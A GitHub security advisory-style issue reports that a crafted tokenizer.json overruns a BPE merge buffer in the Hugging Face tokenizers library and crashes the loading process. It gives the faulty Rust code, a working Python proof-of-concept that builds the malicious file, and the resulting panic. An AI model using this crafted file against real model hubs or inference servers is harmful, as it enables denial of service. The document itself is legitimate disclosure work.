[Security] Load-time process abort when loading a malicious tokenizer.json (BPE merge buffer overrun)


### Summary

Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings, aborts the entire process. The builder sizes a scratch buffer to the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than any vocabulary key overruns the buffer, which Rust turns into a panic. Every Hugging Face model ships a tokenizer.json and they are downloaded and shared, so loading one is a common, deliberate action.

### Details

In `tokenizers/src/models/bpe/model.rs`, `BpeBuilder::build`:

```rust
let mut buffer: Vec<u8> = vec![0; max_len];          // line 251: max_len = byte length of the LONGEST vocab key
...
buffer[0..a.len()].copy_from_slice(a.as_bytes());    // line 264
let b_len = b.len() - prefix_len;
let merge_len = a.len() + b_len;
buffer[a.len()..merge_len].copy_from_slice(&b.as_bytes()[prefix_len..]); // line 267: panics when merge_len > max_len
```

`buffer` is sized to `max_len`, the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of length `merge_len = a.len() + b.len() - prefix_len`, into that buffer. When the concatenated merge token is longer than any vocab key, the slice index is out of bounds and Rust panics. The code already has a graceful error path for out-of-vocabulary merge tokens (`Error::MergeTokenOutOfVocabulary`, exercised by the test `test_bpe_from_file_merge_token_oov`), but the buffer write happens before that check, so this case aborts instead of returning the intended error. A secondary defect at the same site: with `continuing_subword_prefix` set and a merge whose `b.len() < prefix_len`, `b_len` underflows (usize), which panics in debug and corrupts `merge_len` in release.

Sink path: `Tokenizer.from_file` / `from_str` deserializes the BPE model (`bpe/serialization.rs`), calls `BpeBuilder::vocab_and_merges`, then `build`, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.

### PoC

```
pip install tokenizers
python poc_bpe_panic.py
```

`poc_bpe_panic.py`:

```python
import os, json
from tokenizers import Tokenizer
# vocab's longest key is length 2 ("aa","bb"); merge ["aa","bb"] -> "aabb" (len 4) > max_len (2),
# overrunning the merge buffer at bpe/model.rs:267 during LOAD.
malicious = {
    "version": "1.0", "truncation": None, "padding": None,
    "added_tokens": [], "normalizer": None, "pre_tokenizer": None,
    "post_processor": None, "decoder": None,
    "model": {
        "type": "BPE", "dropout": None, "unk_token": None,
        "continuing_subword_prefix": None, "end_of_word_suffix": None,
        "fuse_unk": False, "byte_fallback": False, "ignore_merges": False,
        "vocab": {"aa": 0, "bb": 1},
        "merges": [["aa", "bb"]],
    },
}
p = os.path.expanduser("~/poc_tokenizer.json")
open(p, "w").write(json.dumps(malicious))
Tokenizer.from_file(p)   # panics: range end index 4 out of range for slice of length 2
```

Observed (tokenizers 0.23.1): `thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2`, surfacing in the Python binding as `pyo3_runtime.PanicException` (exit 1), instantly from a tiny input.

### Impact

A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or `panic = "abort"` is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Load-time process abort when loading a malicious tokenizer.json (BPE merge buffer overrun) #2094

Summary

Details

PoC

Impact

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

[Security] Load-time process abort when loading a malicious tokenizer.json (BPE merge buffer overrun) #2094

Description

Summary

Details

PoC

Impact

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions